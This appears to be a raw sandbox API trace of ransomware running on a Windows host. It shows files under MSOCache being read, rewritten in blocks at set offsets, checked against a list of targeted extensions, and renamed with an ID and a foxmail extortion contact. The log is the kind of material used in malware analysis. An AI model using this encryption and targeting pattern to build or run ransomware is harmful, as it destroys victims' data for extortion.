1 [0049.741] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0049.741] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc6c | out: lpNewFilePointer=0x0) returned 1 [0049.741] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc2c | out: lpNewFilePointer=0x0) returned 1 [0049.741] ReadFile (in: hFile=0x20c, lpBuffer=0x44e0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3d5fc38, lpOverlapped=0x0 | out: lpBuffer=0x44e0058*, lpNumberOfBytesRead=0x3d5fc38*=0x40000, lpOverlapped=0x0) returned 1 [0049.745] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0xb84a74, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc2c | out: lpNewFilePointer=0x0) returned 1 [0049.747] ReadFile (in: hFile=0x20c, lpBuffer=0x4520058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3d5fc38, lpOverlapped=0x0 | out: lpBuffer=0x4520058*, lpNumberOfBytesRead=0x3d5fc38*=0x40000, lpOverlapped=0x0) returned 1 [0049.749] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x3d5fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0049.750] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x224df5c, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc2c | out: lpNewFilePointer=0x0) returned 1 [0049.750] ReadFile (in: hFile=0x20c, lpBuffer=0x4560058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3d5fc38, lpOverlapped=0x0 | out: lpBuffer=0x4560058*, lpNumberOfBytesRead=0x3d5fc38*=0x40000, lpOverlapped=0x0) returned 1 [0049.764] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.765] WriteFile (in: hFile=0x20c, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x3d5fcb0, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0050.514] SetEndOfFile (hFile=0x20c) returned 1 [0050.514] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x432d940 [0050.552] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc7c | out: lpNewFilePointer=0x0) returned 1 [0050.552] WriteFile (in: hFile=0x20c, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3d5fc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x3d5fc88*=0x40000, lpOverlapped=0x0) returned 1 [0050.553] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0xb84a74, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc7c | out: lpNewFilePointer=0x0) returned 1 [0050.553] WriteFile (in: hFile=0x20c, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3d5fc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x3d5fc88*=0x40000, lpOverlapped=0x0) returned 1 [0050.554] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x224df5c, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc7c | out: lpNewFilePointer=0x0) returned 1 [0050.554] WriteFile (in: hFile=0x20c, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3d5fc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x3d5fc88*=0x40000, lpOverlapped=0x0) returned 1 [0050.557] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x432d940 | out: hHeap=0xb10000) returned 1 [0050.557] CloseHandle (hObject=0x20c) returned 1 [0050.557] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0050.557] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0050.557] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0050.557] lstrlenW (lpString=".doc") returned 4 [0050.558] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0050.558] lstrlenW (lpString=".docx") returned 5 [0050.558] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0050.558] lstrlenW (lpString=".pdf") returned 4 [0050.558] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0050.558] lstrlenW (lpString=".xls") returned 4 [0050.558] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0050.558] lstrlenW (lpString=".xlsx") returned 5 [0050.558] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0050.558] lstrlenW (lpString=".ppt") returned 4 [0050.558] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0050.558] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0050.558] lstrlenW (lpString=".zip") returned 4 [0050.558] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0050.558] lstrlenW (lpString=".rar") returned 4 [0050.558] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0050.558] lstrlenW (lpString=".bz2") returned 4 [0050.558] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0050.558] lstrlenW (lpString=".7z") returned 3 [0050.558] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0050.558] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0050.558] lstrlenW (lpString=".dbf") returned 4 [0050.558] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0050.558] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0050.558] lstrlenW (lpString=".1cd") returned 4 [0050.558] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0050.558] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0050.559] lstrlenW (lpString=".jpg") returned 4 [0050.559] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0050.559] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0050.559] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0050.559] lstrlenW (lpString=".doc") returned 4 [0050.559] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0050.559] lstrlenW (lpString=".docx") returned 5 [0050.559] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0050.559] lstrlenW (lpString=".pdf") returned 4 [0050.559] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0050.559] lstrlenW (lpString=".xls") returned 4 [0050.559] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0050.559] lstrlenW (lpString=".xlsx") returned 5 [0050.559] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0050.559] lstrlenW (lpString=".ppt") returned 4 [0050.559] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0050.559] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0050.559] lstrlenW (lpString=".zip") returned 4 [0050.559] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0050.559] lstrlenW (lpString=".rar") returned 4 [0050.559] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0050.559] lstrlenW (lpString=".bz2") returned 4 [0050.559] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0050.559] lstrlenW (lpString=".7z") returned 3 [0050.559] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0050.559] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0050.559] lstrlenW (lpString=".dbf") returned 4 [0050.560] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0050.560] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0050.560] lstrlenW (lpString=".1cd") returned 4 [0050.560] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0050.560] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0050.560] lstrlenW (lpString=".jpg") returned 4 [0050.560] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0050.560] lstrcmpiW (lpString1=".xrm-ms", lpString2=".php") returned 1 [0050.560] lstrlenW (lpString="pkeyconfig-office.xrm-ms") returned 24 [0050.560] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0051.222] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x3d5ff1c | out: lpFileSize=0x3d5ff1c*=715834) returned 1 [0051.222] CloseHandle (hObject=0x20c) returned 1 [0051.222] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms")) returned 0x2020 [0051.222] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0051.222] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0051.222] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.222] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.223] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0051.223] GetLastError () returned 0x0 [0051.223] ReadFile (in: hFile=0x20c, lpBuffer=0x44e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3d5fed4, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesRead=0x3d5fed4*=0xaec3a, lpOverlapped=0x0) returned 1 [0051.238] WriteFile (in: hFile=0x208, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0xaec40, lpNumberOfBytesWritten=0x3d5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fc9c*=0xaec40, lpOverlapped=0x0) returned 1 [0051.252] ReadFile (in: hFile=0x20c, lpBuffer=0x44e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3d5fed4, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesRead=0x3d5fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.252] WriteFile (in: hFile=0x208, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x3d5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fc9c*=0x104, lpOverlapped=0x0) returned 1 [0051.252] SetEndOfFile (hFile=0x208) returned 1 [0051.252] CloseHandle (hObject=0x208) returned 1 [0051.252] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.252] SetEndOfFile (hFile=0x20c) returned 1 [0051.258] CloseHandle (hObject=0x20c) returned 1 [0051.258] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0051.258] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms")) returned 1 [0051.259] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0051.259] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0051.259] lstrlenW (lpString=".doc") returned 4 [0051.259] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0051.259] lstrlenW (lpString=".docx") returned 5 [0051.259] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 [0051.259] lstrlenW (lpString=".pdf") returned 4 [0051.259] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0051.259] lstrlenW (lpString=".xls") returned 4 [0051.259] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0051.259] lstrlenW (lpString=".xlsx") returned 5 [0051.259] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0051.259] lstrlenW (lpString=".ppt") returned 4 [0051.259] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0051.259] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0051.259] lstrlenW (lpString=".zip") returned 4 [0051.259] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0051.259] lstrlenW (lpString=".rar") returned 4 [0051.259] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0051.259] lstrlenW (lpString=".bz2") returned 4 [0051.259] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0051.259] lstrlenW (lpString=".7z") returned 3 [0051.259] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0051.259] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0051.259] lstrlenW (lpString=".dbf") returned 4 [0051.259] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0051.259] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0051.259] lstrlenW (lpString=".1cd") returned 4 [0051.259] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1 [0051.259] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0051.260] lstrlenW (lpString=".jpg") returned 4 [0051.260] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1 [0051.260] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0051.260] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0051.260] lstrlenW (lpString=".doc") returned 4 [0051.260] lstrcmpiW (lpString1=".doc", lpString2="m-ms") returned -1 [0051.260] lstrlenW (lpString=".docx") returned 5 [0051.260] lstrcmpiW (lpString1=".docx", lpString2="rm-ms") returned -1 [0051.260] lstrlenW (lpString=".pdf") returned 4 [0051.260] lstrcmpiW (lpString1=".pdf", lpString2="m-ms") returned -1 [0051.260] lstrlenW (lpString=".xls") returned 4 [0051.260] lstrcmpiW (lpString1=".xls", lpString2="m-ms") returned -1 [0051.260] lstrlenW (lpString=".xlsx") returned 5 [0051.260] lstrcmpiW (lpString1=".xlsx", lpString2="rm-ms") returned -1 [0051.260] lstrlenW (lpString=".ppt") returned 4 [0051.260] lstrcmpiW (lpString1=".ppt", lpString2="m-ms") returned -1 [0051.260] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0051.260] lstrlenW (lpString=".zip") returned 4 [0051.260] lstrcmpiW (lpString1=".zip", lpString2="m-ms") returned -1 [0051.260] lstrlenW (lpString=".rar") returned 4 [0051.260] lstrcmpiW (lpString1=".rar", lpString2="m-ms") returned -1 [0051.260] lstrlenW (lpString=".bz2") returned 4 [0051.260] lstrcmpiW (lpString1=".bz2", lpString2="m-ms") returned -1 [0051.260] lstrlenW (lpString=".7z") returned 3 [0051.260] lstrcmpiW (lpString1=".7z", lpString2="-ms") returned -1 [0051.260] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0051.260] lstrlenW (lpString=".dbf") returned 4 [0051.260] lstrcmpiW (lpString1=".dbf", lpString2="m-ms") returned -1 [0051.260] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0051.260] lstrlenW (lpString=".1cd") returned 4 [0051.260] lstrcmpiW (lpString1=".1cd", lpString2="m-ms") returned -1 [0051.261] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 87 [0051.261] lstrlenW (lpString=".jpg") returned 4 [0051.261] lstrcmpiW (lpString1=".jpg", lpString2="m-ms") returned -1 [0051.261] lstrcmpiW (lpString1=".msi", lpString2=".php") returned -1 [0051.261] lstrlenW (lpString="Office32WW.msi") returned 14 [0051.261] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0051.261] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x3d5ff1c | out: lpFileSize=0x3d5ff1c*=1992192) returned 1 [0051.261] CloseHandle (hObject=0x20c) returned 1 [0051.261] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi")) returned 0x2020 [0051.261] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0051.261] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0051.262] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\office32ww.msi.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0051.262] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc6c | out: lpNewFilePointer=0x0) returned 1 [0051.262] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc2c | out: lpNewFilePointer=0x0) returned 1 [0051.262] ReadFile (in: hFile=0x20c, lpBuffer=0x44e0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3d5fc38, lpOverlapped=0x0 | out: lpBuffer=0x44e0058*, lpNumberOfBytesRead=0x3d5fc38*=0x40000, lpOverlapped=0x0) returned 1 [0051.436] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0xa2200, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc2c | out: lpNewFilePointer=0x0) returned 1 [0051.436] ReadFile (in: hFile=0x20c, lpBuffer=0x4520058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3d5fc38, lpOverlapped=0x0 | out: lpBuffer=0x4520058*, lpNumberOfBytesRead=0x3d5fc38*=0x40000, lpOverlapped=0x0) returned 1 [0051.441] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x3d5fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0051.441] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x1a6600, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc2c | out: lpNewFilePointer=0x0) returned 1 [0051.441] ReadFile (in: hFile=0x20c, lpBuffer=0x4560058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3d5fc38, lpOverlapped=0x0 | out: lpBuffer=0x4560058*, lpNumberOfBytesRead=0x3d5fc38*=0x40000, lpOverlapped=0x0) returned 1 [0051.456] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.456] WriteFile (in: hFile=0x20c, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0xc0108, lpNumberOfBytesWritten=0x3d5fcb0, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fcb0*=0xc0108, lpOverlapped=0x0) returned 1 [0051.597] SetEndOfFile (hFile=0x20c) returned 1 [0051.597] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x433d948 [0052.218] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc7c | out: lpNewFilePointer=0x0) returned 1 [0052.218] WriteFile (in: hFile=0x20c, lpBuffer=0x433d948*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3d5fc88, lpOverlapped=0x0 | out: lpBuffer=0x433d948*, lpNumberOfBytesWritten=0x3d5fc88*=0x40000, lpOverlapped=0x0) returned 1 [0052.220] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0xa2200, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc7c | out: lpNewFilePointer=0x0) returned 1 [0052.220] WriteFile (in: hFile=0x20c, lpBuffer=0x433d948*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3d5fc88, lpOverlapped=0x0 | out: lpBuffer=0x433d948*, lpNumberOfBytesWritten=0x3d5fc88*=0x40000, lpOverlapped=0x0) returned 1 [0052.222] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x1a6600, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc7c | out: lpNewFilePointer=0x0) returned 1 [0052.222] WriteFile (in: hFile=0x20c, lpBuffer=0x433d948*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3d5fc88, lpOverlapped=0x0 | out: lpBuffer=0x433d948*, lpNumberOfBytesWritten=0x3d5fc88*=0x40000, lpOverlapped=0x0) returned 1 [0052.224] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x433d948 | out: hHeap=0xb10000) returned 1 [0052.224] CloseHandle (hObject=0x20c) returned 1 [0052.224] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0052.225] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0052.225] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0052.225] lstrlenW (lpString=".doc") returned 4 [0052.225] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0052.225] lstrlenW (lpString=".docx") returned 5 [0052.225] lstrcmpiW (lpString1=".docx", lpString2="W.msi") returned -1 [0052.225] lstrlenW (lpString=".pdf") returned 4 [0052.225] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0052.225] lstrlenW (lpString=".xls") returned 4 [0052.225] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0052.225] lstrlenW (lpString=".xlsx") returned 5 [0052.225] lstrcmpiW (lpString1=".xlsx", lpString2="W.msi") returned -1 [0052.225] lstrlenW (lpString=".ppt") returned 4 [0052.225] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0052.225] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0052.225] lstrlenW (lpString=".zip") returned 4 [0052.225] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0052.225] lstrlenW (lpString=".rar") returned 4 [0052.225] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0052.225] lstrlenW (lpString=".bz2") returned 4 [0052.225] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0052.225] lstrlenW (lpString=".7z") returned 3 [0052.225] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0052.226] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0052.226] lstrlenW (lpString=".dbf") returned 4 [0052.226] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0052.226] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\Office32WW.msi") returned 77 [0052.226] lstrlenW 